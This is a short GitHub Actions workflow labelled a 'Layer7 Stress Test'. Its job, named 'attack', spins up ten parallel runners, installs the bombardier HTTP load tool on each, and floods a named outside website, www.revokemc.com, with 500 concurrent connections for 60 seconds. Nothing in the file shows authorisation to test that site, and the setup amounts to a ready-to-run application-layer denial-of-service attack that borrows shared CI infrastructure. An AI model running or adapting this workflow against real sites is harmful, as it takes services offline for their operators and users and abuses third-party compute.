name: Layer7 Stress Test

on:
  workflow_dispatch:

jobs:
  attack:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
    steps:
      - name: Install bombardier
        run: |
          sudo apt-get update
          sudo apt-get install -y wget
          wget https://github.com/codesenberg/bombardier/releases/download/v1.2.4/bombardier-linux-amd64
          chmod +x bombardier-linux-amd64
          sudo mv bombardier-linux-amd64 /usr/local/bin/bombardier
      - name: Execute Stress Test
        run: |
          bombardier -c 500 -d 60s -l https://www.revokemc.com
